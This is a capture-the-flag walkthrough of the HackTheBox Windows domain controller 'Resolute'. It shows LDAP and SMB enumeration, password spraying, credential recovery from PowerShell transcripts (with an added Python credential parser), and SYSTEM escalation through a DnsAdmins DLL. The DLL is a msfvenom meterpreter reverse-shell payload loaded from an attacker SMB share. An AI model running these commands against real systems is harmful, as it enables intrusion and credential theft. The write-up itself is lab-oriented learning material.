Enumeration

As with any other box, we start by finding out which ports are open.

nmap -sC -sV 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.073s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-18 00:54:42Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/17%Time=5DF976E4%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h48m20s, deviation: 4h37m10s, median: 8m18s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2019-12-17T16:55:05-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-12-18T00:55:02
|_  start_date: 2019-12-18T00:45:56

The results (Kerberos on 88, LDAP on 389 plus the global catalog on 3268, SMB, and DNS, all on a host called RESOLUTE in the megabank.local domain) tell us this is a Windows domain controller, so expect a painful Windows box. We still got plenty of useful information from the scan, so let's dig into those services.

My first go-to is enum4linux:

enum4linux -A 10.10.10.169 

It came back with a list of domain users, pulled over an anonymous (null) SMB/RPC session since we supplied no credentials. That is a great start, but we still need a password for one of those users.

Next we enumerate LDAP to see whether the directory gives up more information.

Quick tip: the ldap-search NSE script returns only 20 objects by default. Set the ldap.maxobjects argument to -1 to get every object back:
nmap -p 389 --script ldap-search --script-args ldap.maxobjects=-1 10.10.10.169

As you may have noticed, that is a lot of data to scroll through. Save your eyes and grep for whatever you are looking for; in our case 'Password'. The -z switch makes grep treat the whole stream as a single record, so the full dump is still printed but every match is highlighted:

nmap -p 389 --script ldap-search --script-args ldap.maxobjects=-1 10.10.10.169 | grep --color=always -z 'Password'

That turns up a password in the description attribute of marko's account (onboarding notes left in description fields are a classic AD finding, since the attribute is readable by any authenticated or, as here, anonymous LDAP client). But where can we use those credentials?

Rookie move on my part: I forgot to run a full port scan at the beginning. The default nmap scan only covers the 1000 most common ports, which is why 5985 did not show up above.

nmap -p- 10.10.10.169

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 22:55 EDT
Nmap scan report for 10.10.10.169
Host is up (0.057s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49682/tcp open  unknown
49710/tcp open  unknown

USER

Port 5985 is WinRM (WS-Management over HTTP; 47001 is the same listener's default port). If the account is allowed to use PowerShell remoting, we can get a shell with a tool called "evil-winrm":

evil-winrm -i 10.10.10.169 -u Marko -p Welcome123! -P 5985

Those creds did not work for marko; he has evidently changed his password since the account was created.

Thoughts: the password looks like the standard one handed to employees when their accounts are created. They are supposed to change it at first logon, but do they always?

So I sprayed that one password across the user list. After trying almost every user I got a hit: melanie.

evil-winrm -i 10.10.10.169 -u melanie -p Welcome123! -P 5985

On to root!

The first step toward root is to pivot to another user. This part is tedious: you have to walk every directory, including hidden ones (Get-ChildItem only shows those with -Force), to find the crumb.

After going through every directory I found a hidden directory called "PSTranscripts". That name means PowerShell transcription is (or was) switched on: it writes every command a user runs, plus the output, to a text file.

Inside is a transcript file that might have something we want. Anything typed on the command line, passwords included, ends up in these files:

get-content PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

We found creds for ryan! Note that his net use command actually failed ("The syntax of this command is:" is cmd telling him the arguments were in the wrong order), but transcription logs the command line as typed, whether or not it works, so the password is in the file anyway.
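Added example, not code from the write-up: a small Python parser for the credential patterns that turn up in PowerShell transcripts. The transcript excerpt inside it is constructed (the ryan line is the one from the box; the second net use and the ConvertTo-SecureString line are invented to show the other shapes). It handles the documented net use syntax with /user:, the broken positional form ryan typed, and plaintext-to-SecureString conversions, and it dedupes the command echo that the error message repeats.

```python
"""Pull credentials out of PowerShell transcript files (added example)."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed excerpt modelled on the PSTranscripts file above. Only the ryan
# command is real; the other two credentials are made up for the example.
TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
cmd : The syntax of this command is:
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
**********************
Command start time: 20191203063600
**********************
PS>net use Y: \\fs01\logs Backup#2019 /user:MEGABANK\svc_backup /persistent:no
PS>$secure = ConvertTo-SecureString 'Sup3rS3cret' -AsPlainText -Force
"""

# net use [X:] \\server\share <everything up to end of line or closing quote>
NET_USE_RE = re.compile(r"net\s+use\s+(?:\S+:\s+)?(?P<share>\\\\\S+)\s+(?P<rest>[^\n\"]*)", re.I)
# ConvertTo-SecureString [-String] 'plaintext' -AsPlainText
SECURESTRING_RE = re.compile(
    r"ConvertTo-SecureString\s+(?:-String\s+)?['\"]?(?P<pw>[^'\"\s]+)['\"]?\s+-AsPlainText", re.I)


def creds_from_net_use(rest: str) -> Tuple[Optional[str], Optional[str]]:
    r"""Parse what follows the share in 'net use X: \\srv\share ...'.

    Documented order is [password] [/user:dom\name] [...]; the box also shows
    the broken positional form '<user> <password>' that ryan typed.
    """
    tokens = rest.split()
    user = None
    for t in tokens:
        if t.lower().startswith("/user:"):
            user = t.split(":", 1)[1]
    positional = [t for t in tokens if not t.startswith("/")]
    if user is None and len(positional) >= 2:
        user, positional = positional[0], positional[1:]
    pw = positional[0] if positional else None
    if pw == "*":  # '*' makes net use prompt, so nothing usable was logged
        pw = None
    return user, pw


def extract_credentials(text: str) -> List[Dict[str, str]]:
    """Every distinct credential in a transcript, in order of first appearance."""
    found: List[Dict[str, str]] = []
    seen = set()

    def add(source: str, target: str, user: Optional[str], password: str) -> None:
        key = (source, target, user, password)
        if key not in seen:  # the error echo repeats the same command line
            seen.add(key)
            found.append({"source": source, "target": target,
                          "user": user or "<current user>", "password": password})

    for m in NET_USE_RE.finditer(text):
        user, pw = creds_from_net_use(m.group("rest"))
        if pw:
            add("net use", m.group("share"), user, pw)
    for m in SECURESTRING_RE.finditer(text):
        add("ConvertTo-SecureString", "-", None, m.group("pw"))
    return found


if __name__ == "__main__":
    for cred in extract_credentials(TRANSCRIPT):
        print(cred)
```

Run it over every PowerShell_transcript.*.txt you find; ryan's failed command comes out once, with the user and password split correctly despite the wrong argument order.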

To log in as ryan we use evil-winrm again:

evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! -P 5985

Let's see what we can find out about ryan:

net user ryan /domain

The output shows he is a member of the Contractors group. What does that group get him?

get-adgroupmember -identity dnsadmins 

Contractors is itself a member of DnsAdmins, so ryan inherits DnsAdmins rights through group nesting (Get-ADGroupMember with the -Recursive switch would list him directly). That matters because DnsAdmins members are allowed to reconfigure the DNS server, and on a domain controller that service runs as SYSTEM.

EXPLOIT

I found an article showing how DnsAdmins membership escalates to SYSTEM: dnscmd lets a DnsAdmins member set the DNS server's ServerLevelPluginDll setting to an arbitrary DLL, and dns.exe, running as SYSTEM, loads that DLL the next time the service starts. It is less a DLL injection than a legitimate plugin-loading feature pointed at a payload.

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise

Let's see if that works!

First we need the name of the DNS server:

dnscmd . /Info 

It is “Resolute.megabank.local”

Now, make the payload using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f dll > pop.dll

Then set up an SMB server to host the DLL. dns.exe will fetch it over SMB as the machine account, so the share needs to allow anonymous access; impacket-smbserver does that by default. Here the share is named POP and serves the directory containing pop.dll:

impacket-smbserver POP /root/htb/boxes/resolute_169/exploit

Go back to the box and point the DNS server at the DLL with dnscmd. The path is a UNC path to our SMB server: attacker IP, then the share name, then the file (the LHOST from the msfvenom command above):

dnscmd Resolute.megabank.local /config /serverlevelplugindll \\10.10.14.20\POP\pop.dll

Set up a meterpreter handler for the same payload, LHOST and LPORT as the msfvenom command to catch the shell.

Now restart the DNS service so it loads the DLL. Use sc.exe by name: inside PowerShell a bare sc is an alias for Set-Content.

sc.exe \\Resolute.megabank.local stop dns
sc.exe \\Resolute.megabank.local start dns

There you go, got a shell as SYSTEM!

Once you are done, clear the ServerLevelPluginDll value again (it is stored under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters) so the service stops loading the DLL on every start. From the defender's side, a change to that value, or dns.exe loading a DLL from a UNC path, is a high-fidelity alert.

SUMMARY

This box was a pain! Enumeration was key; I lost count of how many times I overlooked things. The final exploit was great though: it's not too often that I get to play with a DLL-based privilege escalation!